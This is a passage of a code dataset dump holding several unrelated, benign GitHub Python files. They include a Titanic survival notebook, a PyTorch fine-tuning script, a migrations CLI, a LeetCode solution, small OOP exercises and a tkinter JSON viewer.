'x', command=lambda row=x, col=y, table=\"Right\": click(row, col, table))\n # Button(frame, text=\"x\")\n lbuttons.grid(column=x, row=y, ipadx=10, ipady=10)\n rbuttons.grid(column=x, row=y, ipadx=10, ipady=10)\n\napp.mainloop()\n","repo_name":"JLKI/Battleships","sub_path":"Battleshipv1.py","file_name":"Battleshipv1.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15699640325","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport numpy as np\nget_ipython().magic(u'matplotlib inline')\nsns.set_style(\"whitegrid\")\nfrom sklearn import preprocessing\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# In[ ]:\n\n\n#Load Titanic Dataset\ntrain = pd.read_csv(\"../input/train.csv\")\ntest = pd.read_csv(\"../input/test.csv\")\n\n\n# In[ ]:\n\n\n#Get detailed information about datasets\ntrain.info()\nprint('=' * 40)\ntest.info()\n\n\n# # Feature Engineering\n\n# In[ ]:\n\n\n#Get a view of data\ntrain.head(10)\n\n\n# In[ ]:\n\n\n#Get other description\ntrain.describe()\n\n\n# In[ ]:\n\n\n#Remove unnecessary columns\ntrain.drop(['PassengerId', 'Ticket'], axis=1, inplace=True)\ntest.drop(['Ticket'], axis=1, inplace=True)\n\n\n# In[ ]:\n\n\n#Feature - Pclass\n\n#Number of null values\nprint(\"Total Null Entries in training samples :\", train['Pclass'].isnull().sum())\nprint(\"Total Null Entries in testing samples :\", test['Pclass'].isnull().sum())\n\n#Data Visualization\nfig, (ax1, ax2) = plt.subplots(nrows=1, ncols=2, figsize=(12,5))\nsns.pointplot(data=train, x=\"Pclass\", y=\"Survived\", ax=ax1)\nsns.countplot(data=train, x=\"Pclass\", hue=\"Survived\", ax=ax2)\n\n\n# In[ ]:\n\n\n#Feature - Name\n\n#Number of null values\nprint(\"Total Null Entries in training samples :\", train['Name'].isnull().sum())\nprint(\"Total Null Entries in testing samples :\", test['Name'].isnull().sum())\n\n#Names doesn't matter much, but the title associated with it may help.\n#Extract titles from names\ntrain['Title'] = train[\"Name\"].map(lambda name : name.split(\".\")[0].split(\" \")[-1])\ntest['Title'] = test[\"Name\"].map(lambda name : name.split(\".\")[0].split(\" \")[-1])\ntrain[\"Title\"] = train[\"Title\"].map({\"Mr\" : \"Mr\", \"Mrs\" : \"Mrs\", \"Miss\" : \"Miss\", \"Master\" : \"Master\"})\ntrain[\"Title\"].fillna(\"Others\", inplace=True)\ntest[\"Title\"] = test[\"Title\"].map({\"Mr\" : \"Mr\", \"Mrs\" : \"Mrs\", \"Miss\" : \"Miss\", \"Master\" : \"Master\"})\ntest[\"Title\"].fillna(\"Others\", inplace=True)\n\n#Data Visualization\nfig, ax1 = plt.subplots(nrows=1, ncols=1, figsize=(15,8))\nsns.countplot(data=train, x=\"Title\", hue=\"Survived\", ax=ax1)\n\n#Map titles to nominal values\ntrain[\"Title\"] = train[\"Title\"].map({\"Mr\" : 0, \"Mrs\" : 1, \"Miss\" : 2, \"Master\" : 3, \"Others\" : 4})\ntest[\"Title\"] = test[\"Title\"].map({\"Mr\" : 0, \"Mrs\" : 1, \"Miss\" : 2, \"Master\" : 3, \"Others\" : 4})\n\n#Drop names\ntrain.drop('Name', axis=1, inplace=True)\ntest.drop('Name', axis=1, inplace=True)\n\n\n# In[ ]:\n\n\n#Feature - Sex\n\n#Number of null values\nprint(\"Total Null Entries in training samples :\", train['Sex'].isnull().sum())\nprint(\"Total Null Entries in testing samples :\", test['Sex'].isnull().sum())\n\n#Data Visualization\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12,5))\nsns.pointplot(data=train, x=\"Sex\", y=\"Survived\", ax=ax1)\nsns.countplot(data=train, x=\"Sex\", 
hue=\"Survived\", ax=ax2)\n\n#Map to integer data\ntrain[\"Sex\"] = train[\"Sex\"].map({\"male\" : 0, \"female\" : 1})\ntest[\"Sex\"] = test[\"Sex\"].map({\"male\" : 0, \"female\" : 1})\n\n\n# In[ ]:\n\n\n#Feature - Age\n\n#Number of null values\nprint(\"Total Null Entries in training samples :\", train['Age'].isnull().sum())\nprint(\"Total Null Entries in testing samples :\", test['Age'].isnull().sum())\n\n#One of the way to deal with missing values is to replace them with mean of that feature values, \n#but since there are too many null entries, i will be categorizing these entries into \n#labels - [child, adult, old, missingdata]\n\ntrain[\"AgeCategory\"] = \"Adult\"\ntrain[\"AgeCategory\"].loc[train[\"Age\"] < 18 ] = \"Child\"\ntrain[\"AgeCategory\"].loc[train[\"Age\"] > 50 ] = \"Old\"\ntrain[\"AgeCategory\"].loc[train[\"Age\"].isnull()] = \"MissingData\"\n\ntest[\"AgeCategory\"] = \"Adult\"\ntest[\"AgeCategory\"].loc[train[\"Age\"] < 18 ] = \"Child\"\ntest[\"AgeCategory\"].loc[train[\"Age\"] > 50 ] = \"Old\"\ntest[\"AgeCategory\"].loc[train[\"Age\"].isnull()] = \"MissingData\"\n\n#Data Visualization\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12,5))\nsns.barplot(data=train, x=\"AgeCategory\", y=\"Survived\", ax=ax1, order=[\"Child\", \"Adult\", \"Old\", \"MissingData\"])\nsns.countplot(data=train, x=\"AgeCategory\", hue=\"Survived\", ax=ax2, order=[\"Child\", \"Adult\", \"Old\", \"MissingData\"])\n\n#Map to integer data\ntrain[\"AgeCategory\"] = train[\"AgeCategory\"].map({\"Child\" : 0, \"Adult\" : 1, \"Old\" : 2, \"MissingData\" : 3})\ntest[\"AgeCategory\"] = test[\"AgeCategory\"].map({\"Child\" : 0, \"Adult\" : 1, \"Old\" : 2, \"MissingData\" : 3})\n\n#Drop Age\ntrain.drop(\"Age\", axis=1, inplace=True)\ntest.drop(\"Age\", axis=1, inplace=True)\n\n\n# In[ ]:\n\n\n#Feature - Family\n\n#From sibSp and Parch, we can add whether a person has a family or not.\n#Also we will create another feature determining number of family members onboard.\n\ntrain['Family'] = train['SibSp'] + train['Parch'] + 1\ntrain['FamilySize'] = train['Family']\ntrain['FamilySize'].loc[train['Family'] == 1] = \"Small\"\ntrain['FamilySize'].loc[train['Family'] > 1] = \"Medium\"\ntrain['FamilySize'].loc[train['Family'] > 5] = \"Large\"\ntrain['Family'].loc[train['Family'] > 1] = 'withFamily'\ntrain['Family'].loc[train['Family'] == 1] = 'Alone'\n\ntest['Family'] = test['SibSp'] + test['Parch'] + 1\ntest['FamilySize'] = test['Family']\ntest['FamilySize'].loc[test['Family'] == 1] = \"Small\"\ntest['FamilySize'].loc[test['Family'] > 1] = \"Medium\"\ntest['FamilySize'].loc[test['Family'] > 5] = \"Large\"\ntest['Family'].loc[test['Family'] > 1] = 'withFamily'\ntest['Family'].loc[test['Family'] == 1] = 'Alone'\n\n#Data Visualization\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12,5))\nsns.barplot(data=train, x=\"Family\", y=\"Survived\", ax=ax1)\nsns.countplot(data=train, x=\"Family\", hue=\"Survived\", ax=ax2)\nfig, (ax3, ax4) = plt.subplots(1, 2, figsize=(12,5))\nsns.barplot(data=train, x=\"FamilySize\", y=\"Survived\", ax=ax3, order=[\"Small\", \"Medium\", \"Large\"])\nsns.countplot(data=train, x=\"FamilySize\", hue=\"Survived\", ax=ax4, order=[\"Small\", \"Medium\", \"Large\"])\n\n#Map to integral values\ntrain[\"Family\"] = train[\"Family\"].map({\"Alone\" : 0, \"withFamily\" : 1})\ntrain[\"FamilySize\"] = train[\"FamilySize\"].map({\"Small\" : 0, \"Medium\" : 1, \"Large\" : 2})\ntest[\"Family\"] = test[\"Family\"].map({\"Alone\" : 0, \"withFamily\" : 1})\ntest[\"FamilySize\"] = 
test[\"FamilySize\"].map({\"Small\" : 0, \"Medium\" : 1, \"Large\" : 2})\n\n#Drop SibSp and Parch Columns\ntrain.drop([\"Parch\", \"SibSp\"], axis=1, inplace=True)\ntest.drop([\"Parch\", \"SibSp\"], axis=1, inplace=True)\n\n\n# In[ ]:\n\n\n#Feature - Fare\n\n#Number of null values\nprint(\"Total Null Entries in training samples :\", train['Fare'].isnull().sum())\nprint(\"Total Null Entries in testing samples :\", test['Fare'].isnull().sum())\n\n#Fill null values with mean fare\ntest['Fare'].fillna(train['Fare'].mean(), inplace=True)\n\n#Data Visualization\nfig = plt.figure(figsize=(15,8))\nplt.hist([train[train[\"Survived\"]==0][\"Fare\"], train[train[\"Survived\"]==1][\"Fare\"]], stacked=True, bins=20, label=['Dead', 'Survived'])\nplt.xlabel(\"Fare Range\")\nplt.ylabel(\"Count\")\nplt.legend()\n\n#Fare data contains some extreme values which can be normalized\nscale = preprocessing.MinMaxScaler()\ntrain['normalizedFare'] = scale.fit_transform(train['Fare'].reshape(-1,1))\n\n#Data Visualization\nfig = plt.figure(figsize=(15,8))\nplt.hist([train[train[\"Survived\"]==0][\"normalizedFare\"], train[train[\"Survived\"]==1][\"normalizedFare\"]], stacked=True, bins=10, label=['Dead', 'Survived'])\nplt.xlabel(\"Normalized Fare Range\")\nplt.ylabel(\"Count\")\nplt.legend()\n\ntest[\"normalizedFare\"] = scale.transform(test['Fare'].reshape(-1,1))\ntrain.drop(\"Fare\", axis=1, inplace=True)\ntest.drop(\"Fare\", axis=1, inplace=True)\n\n\n# In[ ]:\n\n\n#Feature - Embarked\n\n#Number of null values\nprint(\"Total Null Entries in training samples :\", train['Embarked'].isnull().sum())\nprint(\"Total Null Entries in testing samples :\", test['Embarked'].isnull().sum())\n\n#Fill missing values with maximum occurence of embarked category\nprint(\"Maximum Occurrence :\", train['Embarked'].describe()['top'])\ntrain['Embarked'].fillna('S', inplace=True)\ntest['Embarked'].fillna('S', inplace=True)\n\n#Data Visualization\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12,5))\nsns.pointplot(data=train, x=\"Embarked\", y=\"Survived\", ax=ax1)\nsns.countplot(data=train, x=\"Embarked\", hue=\"Survived\", ax=ax2)\n\n#Map Ports to integral values\ntrain[\"Embarked\"] = train[\"Embarked\"].map({\"S\" : 0, \"C\" : 1, \"Q\" : 2})\ntest[\"Embarked\"] = test[\"Embarked\"].map({\"S\" : 0, \"C\" : 1, \"Q\" : 2})\n\n\n# In[ ]:\n\n\n#Feature - Cabin\n\n#Number of null values\nprint(\"Total Null Entries in training samples :\", train['Cabin'].isnull().sum())\nprint(\"Total Null Entries in testing samples :\", test['Cabin'].isnull().sum())\n\n#We are also dropping Cabin feature, since it contains a lot of missing values and cannot be used as such.\ntrain.drop(\"Cabin\", axis=1, inplace=True)\ntest.drop(\"Cabin\", axis=1, inplace=True)\n\n\n# # Machine Learning Algorithm Analysis\n\n# In[ ]:\n\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.naive_bayes import GaussianNB, MultinomialNB, BernoulliNB \nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import svm\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier, GradientBoostingClassifier, VotingClassifier\n\n\n# In[ ]:\n\n\n#Divide data into input and target values\nX_train = train.drop(\"Survived\", axis=1)\ny_train = train[\"Survived\"]\n\n#create dictionary to keep track of accuracies\nAccuracy = {}\n\n\n# In[ ]:\n\n\nX_train.head(10)\n\n\n# In[ ]:\n\n\nX_train.describe()\n\n\n# In[ ]:\n\n\n#Method - Naive Bayes 
\n\n#Titanic Dataset is evaluated against all methods in Naive Bayes to decide on best approach.\n\n#Gaussian\nGNB = GaussianNB()\nscores = cross_val_score(GNB, X_train, y_train, cv=5)\naccuracyGNB = scores.mean()\nprint(\"Gaussian Naive Bayes Accuracy :\", accuracyGNB)\n\n#Multinomial\nMNB = MultinomialNB()\nscores = cross_val_score(MNB, X_train, y_train, cv=5)\naccuracyMNB = scores.mean()\nprint(\"Multinomial Naive Bayes Accuracy :\", accuracyMNB)\n\n#Bernoulli\nBNB = BernoulliNB()\nscores = cross_val_score(BNB, X_train, y_train, cv=5)\naccuracyBNB = scores.mean()\nprint(\"Bernoulli Naive Bayes Accuracy :\", accuracyBNB)\n\n#Plot accuracies corresponding to various naive bayes methods\nfig, ax1 = plt.subplots(1, 1, figsize=(8,5))\nfig = sns.barplot(y=[accuracyGNB, accuracyMNB, accuracyBNB], x=[\"GaussianNB\", \"MultinomialNB\", \"BernoulliNB\"], ax=ax1)\nfig.set(xlabel=\"Naive Bayes Methods\", ylabel=\"Accuracy\")\n\n#Finally we decide to use Bernoulli Naive Bayes\nAccuracy[\"naiveBayes\"] = accuracyBNB\n\n\n# In[ ]:\n\n\n#Method - K Nearest Neighbors\n\n#Deciding K is very important factor for KNN.\n#Since target values are either 0 or 1. We have to set K value at least (possible outcomes + 1)3 \n#and maximum square root of number of training samples. We will use cross-validation technique to find optimal value of K.\n\n#Cross-Validation\naccuracy = []\nk_value = []\nfor k in range(3,int(np.sqrt(len(train)))):\n kNN = KNeighborsClassifier(n_neighbors=k)\n scores = cross_val_score(kNN, X_train, y_train, cv=5)\n accuracy.append(scores.mean())\n k_value.append(k)\n\n#Plot accuracies corresponding to value of K\nfig, ax1 = plt.subplots(1, 1, figsize=(15,8))\nfig = sns.pointplot(y=accuracy, x=k_value, ax=ax1)\nfig.set(xlabel=\"K Value\", ylabel=\"Accuracy\")\n\nprint(\"Maximum Accuracy :\", max(accuracy))\nprint(\"Value of K corresponding to maximum accuracy :\", k_value[accuracy.index(max(accuracy))])\n\n#Final value of K must correspond to maximum accuracy.\nkNN = KNeighborsClassifier(n_neighbors=k_value[accuracy.index(max(accuracy))])\nscores = cross_val_score(kNN, X_train, y_train, cv=5)\naccuracy = scores.mean()\nprint(\"K Nearest Neighbor Accuracy :\", accuracy)\nAccuracy[\"kNN\"] = accuracy\n\n\n# In[ ]:\n\n\n#Method - Logistic Regreesion\n\nlogisticRegression = LogisticRegression()\nscores = cross_val_score(logisticRegression, X_train, y_train, cv=5)\naccuracy = scores.mean()\nprint(\"Logistic Regreesion Accuracy :\", accuracy)\nAccuracy[\"logisticRegression\"] = accuracy\n\n\n# In[ ]:\n\n\n#Method - Support Vector Machine\n\n#We will be evaluating SVM with respect to linear kernel, RBF kernel and Polynomial kernel.\n\n#Linear Kernel\nSVML = svm.SVC(kernel=\"linear\")\nscores = cross_val_score(SVML, X_train, y_train, cv=5)\naccuracySVML = scores.mean()\nprint(\"Support Vector Machine Accuracy (Linear Kernel) :\", accuracySVML)\n\n#RBF Kernel\nSVMR = svm.SVC(kernel=\"rbf\")\nscores = cross_val_score(SVMR, X_train, y_train, cv=5)\naccuracySVMR = scores.mean()\nprint(\"Support Vector Machine Accuracy (RBF Kernel) :\", accuracySVMR)\n\n#Polynomial Kernel\nSVMP = svm.SVC(kernel=\"poly\")\nscores = cross_val_score(SVMP, X_train, y_train, cv=5)\naccuracySVMP = scores.mean()\nprint(\"Support Vector Machine Accuracy (Poly Kernel) :\", accuracySVMP)\n\n#Plot accuracies corresponding to various naive bayes methods\nfig, ax1 = plt.subplots(1, 1, figsize=(8,5))\nfig = sns.barplot(y=[accuracySVML, accuracySVMR, accuracySVMP], x=[\"Linear\", \"RBF\", \"Polynomial\"], 
ax=ax1)\nfig.set(xlabel=\"Kernels\", ylabel=\"Accuracy\")\n\n#Finally we decide to use Polynomial Kernel\nAccuracy[\"supportVectorMachine\"] = accuracySVMP\n\n\n# In[ ]:\n\n\n#Method - Decision Tree Classifier\n\ndecisionTree = DecisionTreeClassifier()\nscores = cross_val_score(decisionTree, X_train, y_train, cv=5)\naccuracy = scores.mean()\nprint(\"Decision Tree Classifier Accuracy :\", accuracy)\nAccuracy[\"decisionTree\"] = accuracy\n\n#Feature Weightage\ndecisionTree.fit(X_train, y_train)\nfig = plt.figure(figsize=(15,8))\nfig = sns.barplot(y=list(decisionTree.feature_importances_), x=list(X_train.columns), color=\"orange\")\nfig.set(xlabel=\"features\", ylabel=\"Weights\")\n\n\n# In[ ]:\n\n\n#Method - Random Forest Classifier\n\nrandomForest = RandomForestClassifier(n_estimators=100)\nscores = cross_val_score(randomForest, X_train, y_train, cv=5)\nRFaccuracy = scores.mean()\nprint(\"Random Forest Classifier Accuracy :\", RFaccuracy)\nAccuracy[\"randomForest\"] = RFaccuracy\n\n#Feature Weightage\nrandomForest.fit(X_train, y_train)\nfig = plt.figure(figsize=(15,8))\nfig = sns.barplot(y=list(randomForest.feature_importances_), x=list(X_train.columns), color=\"orange\")\nfig.set(xlabel=\"features\", ylabel=\"Weights\")\n\n\n# In[ ]:\n\n\n#Method - AdaBoost Classifier\n\nadaBoost = AdaBoostClassifier(n_estimators=100)\nscores = cross_val_score(adaBoost, X_train, y_train, cv=5)\naccuracy = scores.mean()\nprint(\"AdaBoost Classifier Accuracy :\", accuracy)\nAccuracy[\"adaBoost\"] = accuracy\n\n#Feature Weightage\nadaBoost.fit(X_train, y_train)\nfig = plt.figure(figsize=(15,8))\nfig = sns.barplot(y=list(adaBoost.feature_importances_), x=list(X_train.columns), color=\"orange\")\nfig.set(xlabel=\"features\", ylabel=\"Weights\")\n\n\n# In[ ]:\n\n\n#Method - Gradient Boosting Classifier\n\ngradientBoosting = GradientBoostingClassifier(n_estimators=100)\nscores = cross_val_score(gradientBoosting, X_train, y_train, cv=5)\naccuracy = scores.mean()\nprint(\"Gradient Boosting Classifier Accuracy :\", accuracy)\nAccuracy[\"gradientBoosting\"] = accuracy\n\n#Feature Weightage\ngradientBoosting.fit(X_train, y_train)\nfig = plt.figure(figsize=(15,8))\nfig = sns.barplot(y=list(gradientBoosting.feature_importances_), x=list(X_train.columns), color=\"orange\")\nfig.set(xlabel=\"features\", ylabel=\"Weights\")\n\n\n# In[ ]:\n\n\n#Method - Voting Classifier\n\n#I have tried many combinations for voting classifiers, here is what i observed-\n# 1) Both gradient boosting and adaboost has similar weightage for features. Hence, I think adding\n# Only one classifier is fine.\n# 2) Naive Baeyes has least accuracy and is not much effective.\n# 3) Adding SVM somehow leads to decrease in accuracy(Maybe due to overfitting). 
Hence, removed.\n# 4) Even though decision tree and random forest uses same tree based algorithms, feature weightage is\n# totally different and hence effective.\n\nvotingClasssifier = VotingClassifier(estimators=[('KNN', kNN), ('LR', logisticRegression), (\"DT\", decisionTree), ('RF', randomForest), ('GB', gradientBoosting)], voting=\"hard\")\nscores = cross_val_score(votingClasssifier, X_train, y_train, cv=5)\naccuracy = scores.mean()\nprint(\"Voting Classifier Accuracy :\", accuracy)\nAccuracy[\"votingClasssifier\"] = accuracy\n\n\n# In[ ]:\n\n\nprint(Accuracy)\n\n\n# In[ ]:\n\n\n#Plot accuracies with repect to multiple methods\nfig = plt.figure(figsize=(15,8))\nfig = sns.pointplot(y=list(Accuracy.values()), x=list(Accuracy.keys()))\nfig.set(ylabel=\"Accuracy\", xlabel=\"Maching Learning Methods\")\n\n\n# In[ ]:\n\n\n#Create test data\nX_test = test.drop(\"PassengerId\", axis=1)\n\n#Run Voting Classifier for better results\nvotingClasssifier.fit(X_train, y_train)\ny_test = votingClasssifier.predict(X_test)\n\n\n# In[ ]:\n\n\nsubmission = pd.DataFrame({\n \"PassengerId\": test[\"PassengerId\"],\n \"Survived\": y_test\n })\nsubmission.to_csv('submission.csv', index=False)\n\n\n# ***Final Result against test set - 0.8134* \n","repo_name":"nischalshrestha/automatic_wat_discovery","sub_path":"Notebooks/py/manojsakhala/titanic-dataset-solution/titanic-dataset-solution.py","file_name":"titanic-dataset-solution.py","file_ext":"py","file_size_in_byte":16591,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2423842030","text":"import torch\r\nfrom torch import nn, optim\r\nfrom torch.utils.data import Dataset, DataLoader\r\nimport torchvision\r\nfrom torchvision import transforms, models\r\nfrom torchvision.datasets import ImageFolder\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nfrom utils import show_images, train\r\n\r\n\r\n# 指定RGB三个通道的均值和方差来将图像通道归一化\r\ntrain_augs = transforms.Compose([\r\n transforms.RandomResizedCrop(size=224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225])\r\n])\r\n\r\ntest_augs = transforms.Compose([\r\n transforms.Resize(size=256),\r\n transforms.CenterCrop(size=224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225])\r\n])\r\n\r\n# 加载数据\r\ndata_dir = './Datasets'\r\ntrain_imgs = ImageFolder(os.path.join(data_dir, 'hotdog/train'), transform=train_augs)\r\ntest_imgs = ImageFolder(os.path.join(data_dir, 'hotdog/test'), transform=test_augs)\r\n\r\n# 修改输出层\r\npretrained_net = models.resnet18(pretrained=True)\r\npretrained_net.fc = nn.Linear(512, 2)\r\n\r\n# 对输出层和其他层设置不同的学习率。 其他层学习率小,对参数进行微调\r\noutput_params = list(map(id, pretrained_net.fc.parameters()))\r\nprint(output_params)\r\nfeature_params = filter(lambda p: id(p) not in output_params, pretrained_net.parameters())\r\nlr = 0.01\r\noptimizer = optim.SGD([{'params': feature_params},\r\n {'params': pretrained_net.fc.parameters(), 'lr': lr * 10}],\r\n lr=lr, weight_decay=0.001)\r\n\r\n\r\ndef train_fine_tuning(net, optimizer, batch_size=128, num_epochs=5):\r\n train_iter = DataLoader(train_imgs, batch_size=batch_size, shuffle=True)\r\n test_iter = DataLoader(train_imgs, batch_size=batch_size)\r\n device= torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n train(net, train_iter, test_iter, optimizer, device, num_epochs)\r\n\r\n\r\ntrain_fine_tuning(pretrained_net, 
optimizer)\r\n","repo_name":"hzxbzp/Pytorch-practice","sub_path":"Fine Tuning.py","file_name":"Fine Tuning.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"30152203391","text":"import logging\nfrom functools import partial\n\nimport click\nfrom tornado.ioloop import IOLoop\nfrom tornado.options import options\n\nfrom . import migrate\n\n\n@click.group()\ndef cli():\n pass\n\n\n@click.group()\ndef migrations():\n pass\n\n\n@click.command()\n@click.option('--migrations_path', help='Python path to migrations package, e.g. perch.migrations')\n@click.option('--previous', help='The previous version of the resource to migrate')\n@click.argument('resource')\ndef create(resource, previous=None, migrations_path=None):\n \"\"\"Create an empty migration for a resource\"\"\"\n if migrations_path:\n file_path = migrate.create(resource, previous_version=previous, package=migrations_path)\n else:\n file_path = migrate.create(resource, previous_version=previous)\n\n click.secho('Created migration file: ' + file_path, fg='green')\n\n@click.command()\n@click.option('--port', help='The database port')\n@click.option('--url', help='The database URL')\n@click.option('--migrations_path', help='Python path to migrations package, e.g. perch.migrations')\ndef run(migrations_path=None, url=None, port=None):\n \"\"\"Run migrations\"\"\"\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n if url:\n url = str(url).rstrip('/')\n options.url_registry_db = url\n\n if port:\n options.db_port = int(port)\n\n if migrations_path:\n migrations = migrate.collect(migrations_path)\n else:\n migrations = migrate.collect()\n\n func = partial(migrate.run_migrations, migrations)\n IOLoop.instance().run_sync(func)\n\nmigrations.add_command(create)\nmigrations.add_command(run)\n\ncli.add_command(migrations)\n\n\nif __name__ == '__main__':\n cli()\n","repo_name":"openpermissions/perch","sub_path":"perch/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3817103320","text":"class Solution(object):\n def search(self, root):\n if root.left == None and root.right == None:\n return [str(root.val)]\n ans = []; pre = str(root.val)+\"->\"\n if root.left != None:\n ansl = self.search(root.left)\n for it in ansl:\n ans.append(pre+it)\n if root.right != None:\n ansr = self.search(root.right)\n for it in ansr:\n ans.append(pre+it)\n return ans\n def binaryTreePaths(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[str]\n \"\"\"\n if root == None:\n return []\n return self.search(root)","repo_name":"chaozc/leetcode","sub_path":"python/p257.py","file_name":"p257.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31135796376","text":"class Projeto:\n def __init__(self, codigo, titulo, responsavel):\n self.codigo = codigo\n self.titulo = titulo\n self.responsavel = responsavel\n\n def __eq__(self, other):\n if isinstance(other, Projeto):\n return self.codigo == other.codigo\n return False\n\n def __repr__(self):\n return f'Projeto(codigo={self.codigo}, titulo={self.titulo}, responsavel={self.responsavel})'\n\n\nclass Participacao(Projeto):\n def __init__(self, codigo, titulo, responsavel, data_inicio, data_fim, aluno):\n super().__init__(codigo, titulo, responsavel)\n self.data_inicio = 
data_inicio\n self.data_fim = data_fim\n self.aluno = aluno\n\n def __repr__(self):\n return f'Participacao(codigo={self.codigo}, titulo={self.titulo}, responsavel={self.responsavel}, ' \\\n f'data_inicio={self.data_inicio}, data_fim={self.data_fim}, aluno={self.aluno})'\n\n\nprojeto1 = Projeto(1, \"Projeto de Coreografias\", \"Beyoncé\")\nprojeto2 = Projeto(2, \"Sistema de Produção Musical\", \"Taylor Swift\")\nprojeto3 = Projeto(3, \"Pesquisa em Performance Vocal\", \"Katy Perry\")\n\nparticipacao1 = Participacao(1, \"Projeto de Coreografias\", \"Beyoncé\",\"2023-01-01\", \"2023-06-30\", \"SP0101\")\nparticipacao2 = Participacao(2, \"Sistema de Produção Musical\", \"Taylor Swift\",\"2023-02-01\", \"2023-07-31\", \"SP0102\")\nparticipacao3 = Participacao(3, \"Pesquisa em Performance Vocal\", \"Katy Perry\",\"2023-01-01\", \"2023-06-30\", \"SP0103\")\n\nprint(projeto1)\nprint(projeto2)\nprint(projeto3)\n\nprint(participacao1)\nprint(participacao2)\nprint(participacao3)","repo_name":"josineudo-arruda/estudo-python","sub_path":"source/07-orientação-a-objectos/exercícios/exer03.py","file_name":"exer03.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7242605752","text":"import json\r\nimport tkinter as tk\r\n\r\nfrom tkinter import filedialog\r\n\r\nclass ListItem(tk.Frame):\r\n def __init__(self, parent, name, data):\r\n super().__init__(master=parent)\r\n self.parent = parent\r\n self.name = name\r\n self.data = data\r\n self.is_leaf = not isinstance(data, dict) and not isinstance(data, list)\r\n self.list_items = []\r\n\r\n self.create_widgets()\r\n\r\n def create_widgets(self):\r\n label = tk.Label(self, text=self.name)\r\n label.bind(\"<Button-1>\", self.expand)\r\n label.pack()\r\n\r\n def expand(self, evt=None):\r\n if len(self.list_items) <= 0:\r\n if isinstance(self.data, dict):\r\n for key in self.data:\r\n self.list_items.append(ListItem(self, key, self.data[key]))\r\n self.list_items[-1].pack()\r\n elif isinstance(self.data, list):\r\n for i, item in enumerate(self.data):\r\n self.list_items.append(ListItem(self, f\"Element: {i}\", item))\r\n self.list_items[-1].pack()\r\n elif self.is_leaf:\r\n self.list_items.append(tk.Label(self, text=f\"{self.data}\"))\r\n self.list_items[-1].pack()\r\n else:\r\n print(\"NOT IMPLEMENTED\")\r\n else:\r\n for item in self.list_items:\r\n item.destroy()\r\n self.list_items = []\r\n\r\n \r\n\r\nclass App(tk.Tk):\r\n def __init__(self):\r\n super().__init__()\r\n self.geometry('800x300')\r\n self.title('JSON Viewer')\r\n self.create_widgets()\r\n self.data = None\r\n\r\n def upload_file(self, e=None):\r\n print(type(self.data))\r\n fname = filedialog.askopenfilename()\r\n new_data = {}\r\n with open(fname, 'r') as f:\r\n new_data = json.load(f)\r\n \r\n if self.data is not None:\r\n self.data.destroy()\r\n self.data = ListItem(self.scrollable_frame, \"root\", new_data)\r\n self.data.pack()\r\n\r\n def create_widgets(self):\r\n frame = tk.Frame(self)\r\n canvas = tk.Canvas(frame)\r\n self.scrollable_frame = tk.Frame(canvas)\r\n scrollbar = tk.Scrollbar(frame, orient=\"vertical\", command=canvas.yview)\r\n canvas.configure(yscrollcommand=scrollbar.set)\r\n\r\n scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\r\n canvas.pack(fill=tk.BOTH)\r\n canvas.create_window((0, 0), window=self.scrollable_frame, anchor='nw')\r\n self.scrollable_frame.bind(\"<Configure>\", lambda e: canvas.configure(scrollregion=canvas.bbox(\"all\")))\r\n\r\n button = 
tk.Button(self.scrollable_frame, text=\"Select File\", command=self.upload_file)\r\n button.pack(side=\"top\")\r\n\r\n self.data = ListItem(self.scrollable_frame, \"root\", {\r\n \"item1\" : 3,\r\n \"item2\" : \"Hi\",\r\n \"item3\" : False,\r\n \"item4\" : None,\r\n \"item5\" : [\r\n 56,\r\n 4,\r\n 345,\r\n 2854,\r\n 535\r\n ],\r\n })\r\n\r\n self.data.pack(fill=tk.BOTH)\r\n\r\n frame.pack(fill=tk.BOTH)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = App()\r\n app.mainloop()","repo_name":"DavidCarlyn/json_viewer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32716671724","text":"import networkx as nx\nimport numpy as np\nimport pickle\n\nG = nx.Graph()\nnode1, node2 = np.loadtxt(graph_input, usecols=(0,1), unpack=True)\n\nfor i in range(len(node1)):\n G.add_edge(node1[i], node2[i])\n\ngraph_num_node = G.number_of_nodes()\nprint(f\"This graph contains {graph_num_node} nodes. \")\n\ngraph_num_edge = G.number_of_edges()\nprint(f\"This graph contains 